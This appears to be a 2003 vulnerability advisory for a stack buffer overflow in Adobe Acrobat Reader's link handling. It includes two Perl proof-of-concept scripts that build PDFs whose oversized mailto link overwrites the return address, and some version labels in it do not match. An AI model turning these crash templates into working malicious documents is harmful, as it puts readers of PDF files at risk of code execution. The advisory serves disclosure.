Buffer Overflow Vulnerability in Adobe Acrobat Reader
1 Jul. 2003
Summary
The Acrobat Reader allows anyone to view, navigate, and print documents in the Adobe Portable Document Format (PDF). There is buffer overflow vulnerability in WWWLaunchNetscape function. It copies link address to 256 bytes (in 5.0.5 version) buffer until '\0' is found. If link is longer than 256 bytes, the return address is overwritten. Notice that user has to run (click on it) our link to exploit this vulnerability. Users also have to have the Netscape browser in their preferences, but it is the default setting.
Credit:
The information has been provided by sec-labs team.
Vulnerable systems:
* Adobe Acrobat Reader version 5.0.7
Impact:
If somebody click on a link from .pdf file that was specially prepared by an attacker, malicious code can be executed with the user's privileges.
Exploits: poc505.pl:
#!/usr/bin/perl
#
# Adobe Acrobat Reader 5.0.5 Buffer Overflow Vulnerability
# PoC exploit by mcbethh / sec-labs
#
# This script will generate poc505.pdf file. Open it in
# adobe acrobat and click on 'click here' link.
# Vulnerable function is WWWLaunchNetscape. Use gdb to see
# that return address was overwritten (by 0x41414141).
open P, ">poc505.tex";
print P '
\documentclass{letter}
\usepackage{hyperref}
\begin{document}
\href{mailto:x'.('X'x252).'AAAA}{\texttt{click here}}
\end{document}';
close P;
system ("pdflatex poc505.tex");
system ("rm -f poc505.tex poc505.out poc505.log poc505.aux");
poc507.pl:
#!/usr/bin/perl
#
# Adobe Acrobat Reader 5.0.7 Buffer Overflow Vulnerability
# PoC exploit by mcbethh / sec-labs
#
# This script will generate poc505.pdf file. Open it in
# adobe acrobat and click on 'click here' link.
# Vulnerable function is WWWLaunchNetscape. Use gdb to see
# that return address was overwritten (by 0x41414141).
open P, ">poc507.tex";
print P '
\documentclass{letter}
\usepackage{hyperref}
\begin{document}
\href{mailto:x'.('X'x508).'AAAA}{\texttt{click here}}
\end{document}';
close P;
system ("pdflatex poc507.tex");
system ("rm -f poc507.tex poc507.out poc507.log poc507.aux");
